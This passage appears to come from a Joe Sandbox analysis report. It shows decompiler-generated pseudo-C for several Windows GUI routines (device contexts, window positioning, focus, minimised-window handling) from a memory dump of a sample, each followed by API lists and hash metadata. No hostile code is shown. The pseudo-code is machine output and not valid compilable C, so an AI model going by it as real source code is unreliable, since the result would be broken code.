                                  								goto L67;
                                  							} else {
                                  								_t275 = _t274 + 1;
                                  								_t368 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									__eflags = _v17 - 1;
                                  									if(_v17 != 1) {
                                  										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                  									} else {
                                  										_t160 =  *(_t375 + 8);
                                  										__eflags = _t160;
                                  										if(_t160 == 0) {
                                  											_v12 = 0xffffffff;
                                  										} else {
                                  											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                  										}
                                  									}
                                  									_t158 = E00413524(_v8, _t368);
                                  									_t295 = _v17;
                                  									_v16 = E0043EA54(_t158, _v17, _v12);
                                  									__eflags = _v16;
                                  									if(__eflags != 0) {
                                  										break;
                                  									}
                                  									_t368 = _t368 + 1;
                                  									_t275 = _t275 - 1;
                                  									__eflags = _t275;
                                  									if(__eflags != 0) {
                                  										continue;
                                  									} else {
                                  										goto L32;
                                  									}
                                  									goto L68;
                                  								}
                                  								E00429054( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                  								_t165 =  *0x44dfb8; // 0x44fbb0
                                  								E0044BA64( *_t165, _v52, __eflags);
                                  							}
                                  						} else {
                                  							__eflags = _t151 == 1;
                                  							if(_t151 == 1) {
                                  								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t277;
                                  								if(_t277 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t278 = _t277 + 1;
                                  									_t369 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v48 = E00413524(_v8, _t369);
                                  										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                  										__eflags = _t173 -  *(_t375 + 8);
                                  										if(_t173 ==  *(_t375 + 8)) {
                                  											break;
                                  										}
                                  										_t177 = E0043EA54(_v48, 1,  *(_t375 + 8));
                                  										__eflags = _t177;
                                  										if(_t177 == 0) {
                                  											_t369 = _t369 + 1;
                                  											_t278 = _t278 - 1;
                                  											__eflags = _t278;
                                  											if(_t278 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  										} else {
                                  											break;
                                  										}
                                  										goto L68;
                                  									}
                                  									E0043F354(_v48, _t375);
                                  								}
                                  							} else {
                                  								goto L67;
                                  							}
                                  						}
                                  					}
                                  					goto L68;
                                  				} else {
                                  					if(_t380 == 0) {
                                  						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t280;
                                  						if(_t280 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t281 = _t280 + 1;
                                  							_t370 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								E00413524(_v8, _t370);
                                  								_t181 = E0043EAF4( *(_t375 + 4), __eflags);
                                  								__eflags = _t181;
                                  								if(_t181 != 0) {
                                  									goto L68;
                                  								}
                                  								_t370 = _t370 + 1;
                                  								_t281 = _t281 - 1;
                                  								__eflags = _t281;
                                  								if(_t281 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  						goto L68;
                                  					} else {
                                  						_t182 = _t137 - 0x2b;
                                  						if(_t182 == 0) {
                                  							_v40 =  *((intOrPtr*)(__edx + 8));
                                  							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t283;
                                  							if(_t283 < 0) {
                                  								goto L67;
                                  							} else {
                                  								_t284 = _t283 + 1;
                                  								_t371 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									_v16 = E0043EA54(E00413524(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                  									__eflags = _v16;
                                  									if(_v16 != 0) {
                                  										break;
                                  									}
                                  									_t371 = _t371 + 1;
                                  									_t284 = _t284 - 1;
                                  									__eflags = _t284;
                                  									if(_t284 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L67;
                                  									}
                                  									goto L69;
                                  								}
                                  								_v24 = E0041C81C(0, 1);
                                  								_push(_t377);
                                  								_push(0x43faca);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t379;
                                  								_v28 = SaveDC( *(_v40 + 0x18));
                                  								_push(_t377);
                                  								_push(0x43faad);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t379;
                                  								E0041CDD8(_v24,  *(_v40 + 0x18));
                                  								E0041CC78(_v24);
                                  								E0043FF3C(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                  								_pop(_t333);
                                  								 *[fs:eax] = _t333;
                                  								_push(0x43fab4);
                                  								__eflags = 0;
                                  								E0041CDD8(_v24, 0);
                                  								return RestoreDC( *(_v40 + 0x18), _v28);
                                  							}
                                  						} else {
                                  							_t214 = _t182 - 1;
                                  							if(_t214 == 0) {
                                  								_v44 =  *((intOrPtr*)(__edx + 8));
                                  								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t286;
                                  								if(_t286 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t287 = _t286 + 1;
                                  									_t372 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v16 = E0043EA54(E00413524(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                  										__eflags = _v16;
                                  										if(_v16 != 0) {
                                  											break;
                                  										}
                                  										_t372 = _t372 + 1;
                                  										_t287 = _t287 - 1;
                                  										__eflags = _t287;
                                  										if(_t287 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L67;
                                  										}
                                  										goto L69;
                                  									}
                                  									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                  									L004063B8();
                                  									_v32 = _t221;
                                  									 *[fs:eax] = _t379;
                                  									_v24 = E0041C81C(0, 1);
                                  									 *[fs:eax] = _t379;
                                  									_v28 = SaveDC(_v32);
                                  									 *[fs:eax] = _t379;
                                  									E0041CDD8(_v24, _v32);
                                  									E0041CC78(_v24);
                                  									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x43fbcb, _t377,  *[fs:eax], 0x43fbe8, _t377,  *[fs:eax], 0x43fc0d, _t377, _t221);
                                  									_pop(_t342);
                                  									 *[fs:eax] = _t342;
                                  									_push(0x43fbd2);
                                  									__eflags = 0;
                                  									E0041CDD8(_v24, 0);
                                  									return RestoreDC(_v32, _v28);
                                  								}
                                  							} else {
                                  								if(_t214 == 0x27) {
                                  									_v36 =  *((intOrPtr*)(__edx + 8));
                                  									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  									__eflags = _t290;
                                  									if(_t290 < 0) {
                                  										goto L67;
                                  									} else {
                                  										_t291 = _t290 + 1;
                                  										_t373 = 0;
                                  										__eflags = 0;
                                  										while(1) {
                                  											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413524(_v8, _t373))) + 0x34))();
                                  											_t346 = _v36;
                                  											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                  											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                  												_v16 = E0043EA54(E00413524(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                  											} else {
                                  												_v16 =  *((intOrPtr*)(E00413524(_v8, _t373) + 0x34));
                                  											}
                                  											__eflags = _v16;
                                  											if(_v16 != 0) {
                                  												break;
                                  											}
                                  											_t373 = _t373 + 1;
                                  											_t291 = _t291 - 1;
                                  											__eflags = _t291;
                                  											if(_t291 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  											goto L68;
                                  										}
                                  										_t257 = E0043EA84(E00413524(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                  										__eflags = _t257;
                                  										if(_t257 == 0) {
                                  											_t265 = E00413524(_v8, _t373);
                                  											__eflags = 0;
                                  											_t257 = E0043EA84(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                  										}
                                  										_t353 =  *0x44e0ec; // 0x44fbb4
                                  										_t355 =  *( *_t353 + 0x6c);
                                  										__eflags = _t355;
                                  										if(_t355 != 0) {
                                  											__eflags = _t257;
                                  											if(_t257 == 0) {
                                  												_t257 =  *(_t355 + 0x158);
                                  											}
                                  											_t307 =  *0x44e0ec; // 0x44fbb4
                                  											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                  											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                  												_t356 =  *0x44dfb8; // 0x44fbb0
                                  												E0044B708( *_t356, _t291, _t307, _t257, _t373, _t375);
                                  											} else {
                                  												E0044B770();
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L67:
                                  									_push( *(_t375 + 8));
                                  									_push( *(_t375 + 4));
                                  									_push( *_t375);
                                  									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                  									_push(_t144);
                                  									L004061D0();
                                  									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                  								}
                                  								L68:
                                  								_pop(_t311);
                                  								 *[fs:eax] = _t311;
                                  								_push(0x43fc9e);
                                  								return E00403E10( &_v52);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L69:
                                  			}


                                  APIs
                                  • SaveDC.GDI32(?), ref: 0043FA33
                                  • RestoreDC.GDI32(?,?), ref: 0043FAA7
                                  • 72E7B080.USER32(?,00000000,0043FC97), ref: 0043FB21
                                  • SaveDC.GDI32(?), ref: 0043FB58
                                  • RestoreDC.GDI32(?,?), ref: 0043FBC5
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0043FC97), ref: 0043FC79
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4024241980-0
                                  • Opcode ID: 6bd54ce8a790ba2b91da0f438a2b66d8d9663673e015c4bf75d58f247bffaec7
                                  • Instruction ID: f51fcd96bcfc0ac8f3d666de58dc3418fc0fcc0aeffc3f25c7b0c37663b036d6
                                  • Opcode Fuzzy Hash: 6bd54ce8a790ba2b91da0f438a2b66d8d9663673e015c4bf75d58f247bffaec7
                                  • Instruction Fuzzy Hash: 6FE12674A042099BDB10EFAAC88199AB7F5FF4C304F25A5A6E805A7361C738ED45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00444908(intOrPtr __eax, struct HWND__** __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				intOrPtr _v16;
                                  				struct HDC__* _v20;
                                  				struct HWND__* _v24;
                                  				void* __ebp;
                                  				struct HWND__* _t92;
                                  				intOrPtr _t112;
                                  				intOrPtr _t115;
                                  				struct HWND__* _t121;
                                  				struct HWND__* _t124;
                                  				intOrPtr _t128;
                                  				struct HWND__* _t129;
                                  				intOrPtr _t130;
                                  				intOrPtr _t131;
                                  				struct HWND__* _t133;
                                  				struct HWND__* _t136;
                                  				intOrPtr _t142;
                                  				intOrPtr _t172;
                                  				struct HDC__* _t177;
                                  				struct HWND__** _t200;
                                  				struct HWND__* _t218;
                                  				struct HWND__* _t219;
                                  				intOrPtr _t228;
                                  				void* _t230;
                                  				void* _t231;
                                  				intOrPtr _t237;
                                  				intOrPtr _t245;
                                  				struct HWND__* _t249;
                                  				struct HWND__* _t250;
                                  				struct HWND__* _t255;
                                  				struct HWND__* _t256;
                                  				void* _t258;
                                  				void* _t260;
                                  				intOrPtr _t261;
                                  				void* _t263;
                                  				void* _t267;
                                  
                                  				_t258 = _t260;
                                  				_t261 = _t260 + 0xffffffec;
                                  				_t200 = __edx;
                                  				_v8 = __eax;
                                  				_t92 =  *__edx;
                                  				_t218 = _t92;
                                  				_t263 = _t218 - 0x46;
                                  				if(_t263 > 0) {
                                  					_t219 = _t218 - 0xb01a;
                                  					__eflags = _t219;
                                  					if(_t219 == 0) {
                                  						__eflags =  *(_v8 + 0xa0);
                                  						if(__eflags != 0) {
                                  							E004032D4(_v8, __eflags);
                                  						}
                                  					} else {
                                  						__eflags = _t219 == 1;
                                  						if(_t219 == 1) {
                                  							__eflags =  *(_v8 + 0xa0);
                                  							if(__eflags != 0) {
                                  								E004032D4(_v8, __eflags);
                                  							}
                                  						} else {
                                  							goto L41;
                                  						}
                                  					}
                                  					goto L43;
                                  				} else {
                                  					if(_t263 == 0) {
                                  						_t112 = _v8;
                                  						_t228 =  *0x444d3c; // 0x1
                                  						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x444d38);
                                  						if(_t228 == ( *(_t112 + 0x1c) &  *0x444d38)) {
                                  							_t115 = _v8;
                                  							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
                                  							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
                                  								_t128 = _v8;
                                  								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
                                  								if( *((char*)(_t128 + 0x22b)) != 2) {
                                  									_t129 = __edx[2];
                                  									_t26 = _t129 + 0x18;
                                  									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
                                  									__eflags =  *_t26;
                                  								}
                                  							}
                                  							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                  							__eflags = _t121;
                                  							if(_t121 == 0) {
                                  								L30:
                                  								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                  								__eflags = _t124;
                                  								if(_t124 == 0) {
                                  									L32:
                                  									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
                                  								} else {
                                  									__eflags = _t124 == 3;
                                  									if(_t124 == 3) {
                                  										goto L32;
                                  									}
                                  								}
                                  							} else {
                                  								__eflags = _t121 == 2;
                                  								if(_t121 == 2) {
                                  									goto L30;
                                  								}
                                  							}
                                  						}
                                  						goto L43;
                                  					} else {
                                  						_t230 = _t218 + 0xfffffffa - 3;
                                  						if(_t230 < 0) {
                                  							__eflags =  *0x44dc20;
                                  							if( *0x44dc20 != 0) {
                                  								__eflags =  *__edx - 7;
                                  								if( *__edx != 7) {
                                  									goto L43;
                                  								} else {
                                  									_t130 = _v8;
                                  									__eflags =  *(_t130 + 0x1c) & 0x00000010;
                                  									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
                                  										goto L43;
                                  									} else {
                                  										_t255 = 0;
                                  										_t131 = _v8;
                                  										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
                                  										if( *((char*)(_t131 + 0x22f)) != 2) {
                                  											_t133 =  *(_v8 + 0x220);
                                  											__eflags = _t133;
                                  											if(_t133 != 0) {
                                  												__eflags = _t133 - _v8;
                                  												if(_t133 != _v8) {
                                  													_t255 = E004325A4(_t133);
                                  												}
                                  											}
                                  										} else {
                                  											_t136 = E00445234(_v8);
                                  											__eflags = _t136;
                                  											if(_t136 != 0) {
                                  												_t255 = E004325A4(E00445234(_v8));
                                  											}
                                  										}
                                  										__eflags = _t255;
                                  										if(_t255 == 0) {
                                  											goto L43;
                                  										} else {
                                  											_t92 = SetFocus(_t255);
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L44;
                                  						} else {
                                  							_t231 = _t230 - 0x22;
                                  							if(_t231 == 0) {
                                  								_v24 = __edx[2];
                                  								__eflags = _v24->i - 1;
                                  								if(_v24->i != 1) {
                                  									goto L43;
                                  								} else {
                                  									_t142 = _v8;
                                  									__eflags =  *(_t142 + 0x248);
                                  									if( *(_t142 + 0x248) == 0) {
                                  										goto L43;
                                  									} else {
                                  										_t249 = E0043EA54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                  										__eflags = _t249;
                                  										if(_t249 == 0) {
                                  											goto L43;
                                  										} else {
                                  											_v16 = E0041C81C(0, 1);
                                  											_push(_t258);
                                  											_push(0x444b81);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t261;
                                  											_v12 = SaveDC( *(_v24 + 0x18));
                                  											_push(_t258);
                                  											_push(0x444b64);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t261;
                                  											E0041CDD8(_v16,  *(_v24 + 0x18));
                                  											E0041CC78(_v16);
                                  											E0043FF3C(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                  											_pop(_t237);
                                  											 *[fs:eax] = _t237;
                                  											_push(0x444b6b);
                                  											__eflags = 0;
                                  											E0041CDD8(_v16, 0);
                                  											return RestoreDC( *(_v24 + 0x18), _v12);
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								if(_t231 == 1) {
                                  									_t256 = __edx[2];
                                  									__eflags = _t256->i - 1;
                                  									if(_t256->i != 1) {
                                  										goto L43;
                                  									} else {
                                  										_t172 = _v8;
                                  										__eflags =  *(_t172 + 0x248);
                                  										if( *(_t172 + 0x248) == 0) {
                                  											goto L43;
                                  										} else {
                                  											_t250 = E0043EA54( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
                                  											__eflags = _t250;
                                  											if(_t250 == 0) {
                                  												goto L43;
                                  											} else {
                                  												_t177 = E004325A4(_v8);
                                  												L004063B8();
                                  												_v20 = _t177;
                                  												 *[fs:eax] = _t261;
                                  												_v16 = E0041C81C(0, 1);
                                  												 *[fs:eax] = _t261;
                                  												_v12 = SaveDC(_v20);
                                  												 *[fs:eax] = _t261;
                                  												E0041CDD8(_v16, _v20);
                                  												E0041CC78(_v16);
                                  												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x444c6b, _t258,  *[fs:eax], 0x444c88, _t258,  *[fs:eax], 0x444caf, _t258, _t177);
                                  												_pop(_t245);
                                  												 *[fs:eax] = _t245;
                                  												_push(0x444c72);
                                  												__eflags = 0;
                                  												E0041CDD8(_v16, 0);
                                  												return RestoreDC(_v20, _v12);
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L41:
                                  									_t267 = _t92 -  *0x44fbbc; // 0xc075
                                  									if(_t267 == 0) {
                                  										E0042D05C(_v8, 0, 0xb025, 0);
                                  										E0042D05C(_v8, 0, 0xb024, 0);
                                  										E0042D05C(_v8, 0, 0xb035, 0);
                                  										E0042D05C(_v8, 0, 0xb009, 0);
                                  										E0042D05C(_v8, 0, 0xb008, 0);
                                  										E0042D05C(_v8, 0, 0xb03d, 0);
                                  									}
                                  									L43:
                                  									_t92 = E0042FFB8(_v8, _t200);
                                  									L44:
                                  									return _t92;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080Focus
                                  • String ID:
                                  • API String ID: 809140284-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0044AC68(void* __eax) {
                                  				struct HWND__* _t21;
                                  				intOrPtr* _t26;
                                  				signed int _t29;
                                  				intOrPtr* _t30;
                                  				int _t33;
                                  				intOrPtr _t36;
                                  				void* _t51;
                                  				int _t60;
                                  
                                  				_t51 = __eax;
                                  				_t21 = IsIconic( *(__eax + 0x30));
                                  				if(_t21 != 0) {
                                  					SetActiveWindow( *(_t51 + 0x30));
                                  					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                  						L6:
                                  						E00449BD0( *(_t51 + 0x30), 9, __eflags);
                                  					} else {
                                  						_t60 = IsWindowEnabled(E004325A4( *((intOrPtr*)(_t51 + 0x44))));
                                  						if(_t60 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_push(0);
                                  							_push(0xf120);
                                  							_push(0x112);
                                  							_push( *(_t51 + 0x30));
                                  							L004061D0();
                                  						}
                                  					}
                                  					_t26 =  *0x44de70; // 0x44f8f8
                                  					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                  					if(_t60 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					_t30 =  *0x44de70; // 0x44f8f8
                                  					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                  					if(_t60 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                  					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                  					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                  						E004458DC(_t36, 0);
                                  						E00447CF8( *((intOrPtr*)(_t51 + 0x44)));
                                  					}
                                  					E0044A2B0(_t51);
                                  					_t21 =  *0x44fbb4; // 0x2191320
                                  					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                  					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                  						_t21 = SetFocus(E004325A4(_t55));
                                  					}
                                  					if( *((short*)(_t51 + 0x122)) != 0) {
                                  						return  *((intOrPtr*)(_t51 + 0x120))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}

                                  APIs
                                  • IsIconic.USER32 ref: 0044AC70
                                  • SetActiveWindow.USER32(?,?,?,?,0044A691,00000000,0044AB52), ref: 0044AC81
                                  • IsWindowEnabled.USER32(00000000), ref: 0044ACA4
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,0044A691,00000000,0044AB52), ref: 0044ACBD
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,0044A691,00000000,0044AB52), ref: 0044AD03
                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,0044A691,00000000,0044AB52), ref: 0044AD48
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00431F90(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                  				void* _v20;
                                  				struct _WINDOWPLACEMENT _v48;
                                  				char _v64;
                                  				void* _t31;
                                  				int _t45;
                                  				int _t51;
                                  				void* _t52;
                                  				int _t56;
                                  				int _t58;
                                  
                                  				_t56 = __ecx;
                                  				_t58 = __edx;
                                  				_t52 = __eax;
                                  				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                  					L4:
                                  					if(E00432804(_t52) == 0) {
                                  						L7:
                                  						 *(_t52 + 0x40) = _t58;
                                  						 *(_t52 + 0x44) = _t56;
                                  						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                  						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                  						_t31 = E00432804(_t52);
                                  						__eflags = _t31;
                                  						if(_t31 != 0) {
                                  							_v48.length = 0x2c;
                                  							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                  							E0042B890(_t52,  &_v64);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                  						}
                                  						L9:
                                  						E0042B544(_t52);
                                  						return E004032D4(_t52, _t66);
                                  					}
                                  					_t45 = IsIconic( *(_t52 + 0x180));
                                  					_t66 = _t45;
                                  					if(_t45 != 0) {
                                  						goto L7;
                                  					}
                                  					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                  					goto L9;
                                  				} else {
                                  					_t51 = _a4;
                                  					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                  						return _t51;
                                  					}
                                  					goto L4;
                                  				}
                                  			}

                                  APIs
                                  • IsIconic.USER32 ref: 00431FCF
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00431FED
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00432023
                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00432047
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0044ABB8(void* __eax) {
                                  				int _t21;
                                  				struct HWND__* _t36;
                                  				void* _t40;
                                  
                                  				_t40 = __eax;
                                  				_t1 = _t40 + 0x30; // 0x0
                                  				_t21 = IsIconic( *_t1);
                                  				if(_t21 == 0) {
                                  					E0044A2A0();
                                  					_t2 = _t40 + 0x30; // 0x0
                                  					SetActiveWindow( *_t2);
                                  					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E004325A4( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                  						_t15 = _t40 + 0x30; // 0x0
                                  						_t21 = E00449BD0( *_t15, 6, __eflags);
                                  					} else {
                                  						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                  						_t36 = E004325A4( *((intOrPtr*)(_t40 + 0x44)));
                                  						_t13 = _t40 + 0x30; // 0x0
                                  						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                  						_push(0);
                                  						_push(0xf020);
                                  						_push(0x112);
                                  						_t14 = _t40 + 0x30; // 0x0
                                  						_t21 =  *_t14;
                                  						_push(_t21);
                                  						L004061D0();
                                  					}
                                  					if( *((short*)(_t40 + 0x11a)) != 0) {
                                  						return  *((intOrPtr*)(_t40 + 0x118))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}







                                  APIs
                                  • IsIconic.USER32 ref: 0044ABC0
                                  • SetActiveWindow.USER32(00000000,00000000,?,?,0044B1E4), ref: 0044ABD8
                                  • IsWindowEnabled.USER32(00000000), ref: 0044ABFB
                                  • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0044B1E4), ref: 0044AC24
                                  • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0044AC39
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 1720852555-0
                                  • Opcode ID: a9467dd3da0ad9118170fbd8614bdaf792fcca640980f35251a04851ee30ca1d
